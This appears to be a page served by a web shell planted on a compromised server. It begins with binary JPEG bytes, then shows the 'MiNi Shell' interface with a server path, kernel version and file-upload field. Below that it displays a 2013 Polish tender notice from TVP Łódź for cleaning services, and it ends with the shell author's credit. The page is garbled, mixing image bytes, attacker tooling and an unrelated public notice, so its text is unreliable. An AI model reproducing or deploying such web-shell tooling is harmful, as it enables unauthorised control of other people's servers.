JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130827/345268-N-2013.html

<p class="kh_header"><b>Łódź: ŚWIADCZENIE USŁUG SPRZĄTANIA OBIEKTÓW TVP S.A. ODDZIAŁ TERENOWY W ŁODZI</b><br>
<b>Numer ogłoszenia: 345268 - 2013; data zamieszczenia: 27.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Telewizja Polska S.A. Oddział w Łodzi , ul. G. Narutowicza 13, 90-117 Łódź, woj. łódzkie, tel. 042 6359202.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: telewizja publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG SPRZĄTANIA OBIEKTÓW TVP S.A. ODDZIAŁ TERENOWY W ŁODZI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Sprzątanie pomieszczeń w Oddziale  TVP S.A. w Łodzi w obiektach przy ul. Narutowicza 13 o powierzchni całkowitej 5.045 m2  i  w  Bazie Transmisji i Transportu przy  ul. Cmentarnej 9 /11 
o  powierzchni całkowitej 424 m2 ,  a w szczególności:
a)codziennie: zamiatanie i mycie podłóg pomieszczeń, korytarzy,  klatek   schodowych,  poręczy, schodów zewnętrznych;  odkurzanie wykładzin,  sprzętów, parapetów okiennych, mebli i innego wyposażenia,   opróżnianie   koszy na  śmieci i   popielniczek, mycie luster, urządzeń sanitarnych i armatury łącznie z usuwaniem z nich kamienia za pomocą sody kaustycznej, utrzymywanie w stałej czystości kabiny windy, uzupełnianie mydła, papieru toaletowego i ręczników jednorazowych we wszystkich toaletach oraz wykonywanie podobnych prac czystościowych wg uzgodnień z  użytkownikami pomieszczeń;
b)raz w tygodniu: mycie glazury, mycie drzwi oszklonych wejścia głównego i oszklenia Biura Reklamy
c)w pierwszym tygodniu każdego miesiąca: mycie stolarki drzwiowej .
d)dwa razy w roku: mycie pozostałych  szyb i konstrukcji okien w  obu  sprzątanych obiektach (ul. Narutowicza 13 -  592 m2, ul. Cmentarna 9/11 - 53,80 m2 )  -  w kwietniu  i  drugiej połowie października;  czyszczenie i konserwacja polimerem  podłogi w  dużym studiu oraz  posadzki korytarzy - ( terminy podaje Zleceniodawca);
e)w miarę potrzeb : sprzątanie pomieszczeń i mycie okien, również po remontach  (średnio  100 m2 pomieszczenia  na miesiąc w rozliczeniu rocznym);
 2. Sprzątanie  terenu  zewnętrznego 
 a)   przy ul. Narutowicza 13    o powierzchni całkowitej  1.640m2  (podwórko, chodnik, ulica dojazdowa wzdłuż budynku Oddziału oraz parking użytkowany przez Zamawiającego),  codziennie: opróżnianie koszy, zamiatanie całego terenu, zgrabianie liści  w miarę potrzeb, a w okresie zimowym ( przez co Zamawiający rozumie czas od momentu pojawienia się śniegu do jego stopnienia) : odśnieżanie, skuwanie lodu i posypywaniesolą  i  piachem nawierzchni  (bez odrębnego wzywania do wykonania tych prac)
 b) przy ul.  Cmentarnej 9/1 o powierzchni całkowitej 2.360 m2 (chodnik, plac manewrowy,trawniki, ale bez  sprzątania garaży),  codziennie: opróżnianie koszy, zamiatanie całego terenu, zgrabianie liści w miarę
potrzeb  oraz  w okresie zimowym (przez co Zamawiający rozumie czas od momentu pojawienia się śniegu dojego stopnienia): odśnieżanie i skuwanie lodu.Zamawiający wymaga, aby  nawierzchnia placu manewrowego i chodnika była w sezonie zimowym posypywana solą  aż do całkowitej likwidacji śliskości
(bez odrębnego wzywania do wykonania tych prac).
 w miarę potrzeb : koszenie trawy na trawnikach
3. W okresie zimowym ( przez co Zamawiający rozumie czas od momentu pojawienia się śniegu do jego stopnienia) plac manewrowy, droga dojazdowa, chodniki, parking, wymienione w punktach 2 a i 2 b),  muszą być odśnieżone przez całą dobę, przez siedem dni tygodnia. Nie dopuszcza się składowania zgarniętego śniegu i lodu pod ścianami budynków ani na terenie placu manewrowego oraz pod płotem wzdłuż chodnika. Wykonawca zapewni  sól i piach do posypywania w okresie zimowego  odśnieżania. 
4. Prace porządkowe odbywać się będą w następujących porach:
- wewnątrz budynku przy  ul. Narutowicza 13  od poniedziałku do piątku  w godz. 5.00 -  9.00  - 5 pracowników Wykonawcy;
od poniedziałku do piątku  w godz. 8.00 - 16.00  - 1 pracownik Wykonawcy.
Dodatkowo Zamawiający będzie wymagał dyżuru jednego pracownika Wykonawcy od poniedziałku do piątku między godz. 16.00 a 22.00, a  w soboty i niedziele miedzy godz.7.00 a 22.00 (średnio 20 godz. na miesiąc w rozliczeniu rocznym) po każdorazowym uzgodnieniu z Zamawiającym, z jednodniowym wyprzedzeniem.
- wewnątrz budynku przy ul. Cmentarnej 9/11
od poniedziałku do piątku  w godz. 7.00 - 11.00  - 1 pracownik Wykonawcy;
ilość pracowników Wykonawcy  do utrzymania w czystości terenów zewnętrznych ustali Wykonawca.
5. Prace porządkowe winny być wykonywane przez pracowników Wykonawcy, przy pomocy jego sprzętu, materiałów i środków czystości. Sprzęt powinien być sprawny, kompletny ( co najmniej  zgodny ze standardowym wyposażeniem producenta), bez śladu doraźnych napraw,  wyprodukowany nie wcześniej niż w 2010 r. Wykonawca musi dysponować co najmniej   7 odkurzaczami o mocy nie mniejszej niż 1500W oraz 7 kompletami do sprzątania ( wózek+mop). 
Środki czystości i materiały  muszą posiadać atesty PZH, skutecznie czyścić zabrudzone powierzchnie oraz być odpowiednie do danego rodzaju powierzchni i nie powodować jej uszkodzenia lub zniszczenia. Należy stosować środki uznanych na rynku producentów środków czystości. W momencie przystąpienia do realizacji zamówienia Wykonawca przedstawi do akceptacji Zamawiającego listę środków czystości, których będzie używał.
Zamawiający zastrzega sobie prawo do kontroli sprzętu i środków używanych do wykonania usługi.
W przypadku  używania nieprawidłowego sprzętu i środków Wykonawca poniesie  koszty naprawienia szkód, spowodowanych ich  użyciem i oraz zobowiązany jest do niezwłocznej wymiany sprzętu lub środka na właściwy. 
Uwaga:  Środki wyposażenia toalet (mydło w płynie, ręczniki jednorazowe, papier toaletowy) zapewnia Zamawiający
6. Wykonawca  zapewni jednolity, estetyczny strój  osób, wykonujących usługi.
7. Przed podpisaniem umowy Wykonawca przedłoży Zamawiającemu listę osób, które będą realizować przedmiotowe zamówienie wraz z oświadczeniem, że posiadają one wszystkie uprawnienia do jego realizacji oraz niezbędne badania  lekarskie.
8. Przy pobieraniu kluczy do sprzątania pomieszczeń oraz ich zdawaniu osoby sprzątające zobowiązane są do wpisywania się do książki na portierni z zaznaczeniem dokładnej godziny ich pobrania i zdania.
9. Podczas  pracy każda z osób sprzątających otwiera tylko to pomieszczenie, które aktualnie sprząta. Drzwi pozostałych pomieszczeń powinny być w tym czasie zamknięte na klucz.
10. Po zakończeniu pracy  w danym pokoju osoba sprzątająca zobowiązana jest do sprawdzenia zamknięcia okien.
11. Kontrola czystości pomieszczeń będzie prowadzona przez Zamawiającego. Z czynności tej będzie sporządzany protokół, który zostanie przekazany Wykonawcy. Przy drugim negatywnym protokole zawierającym opis usterek i nieprawidłowości Zamawiający naliczy Wykonawcy kary umowne, zgodne z umową.
12.Zamawiający udostępni Wykonawcy  pomieszczenie do przechowywania sprzętu w każdym z obiektów.
13. Wskazane jest, by Wykonawcy przed opracowaniem oferty dokonali wizji lokalnej w obiektach Zamawiającego.Terminy wizji 29.08.2013 i 30.08.2013 godz. 12:00 po uprzednim kontakcie tel. z Wojciechem Siewierskim (601 600 466).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE WYMAGA WNIESIENIA WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni jako spełniony warunek udziału w postępowaniu określony w art. 22 ust. 1 Ustawy na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz dokumentów przedłożonych przez Wykonawcę, wymienionych w pkt 9.3 SIWZ, których treść potwierdzać będzie, że Wykonawca posiada uprawnienia do prowadzenia działalności gospodarczej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni jako spełniony warunek posiadania wiedzy i doświadczenia do wykonania zamówienia na podstawie  wykazu usług  wykonanych lub wykonywanych przez Wykonawcę  w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Zamawiający wymaga, aby Wykonawca zrealizował w tym czasie co najmniej     2 usługi sprzątania obiektów o wartości nie mniejszej niż 100 000,00 zł każda (Załącznik nr 5 do SIWZ );</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni jako spełniony warunek dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia na podstawie  wykazu usług  wykonanych lub wykonywanych przez Wykonawcę  w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Zamawiający wymaga, aby Wykonawca zrealizował w tym czasie co najmniej     2 usługi sprzątania obiektów o wartości nie mniejszej niż 100 000,00 zł każda (Załącznik nr 5 do SIWZ );</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni jako spełniony warunek sytuacji ekonomicznej i finansowej na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu (Załącznik nr 3 do SIWZ) oraz oświadczenia Wykonawcy o posiadaniu polisy ubezpieczeniowej OC o wysokości nie mniejszej niż 1.000  000,00 zł z tytułu prowadzonej działalności;(pkt 5 formularza Oferty)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>NIE DOTYCZY</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tvp.pl/zamowienia_publiczne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Telewizja Polska S.A. ,ul. J.P. Woronicza 17 00 - 999  Warszawa 
Oddział Terenowy w Łodzi,ul. Narutowicza 13, 90-117 Łódź , pok. nr 222.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2013 godzina 12:00, miejsce: Telewizja Polska S.A. ,ul. J.P. Woronicza 17 00 - 999  Warszawa 
Oddział Terenowy w Łodzi,ul. Narutowicza 13, 90-117 Łódź , pok. nr 222.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com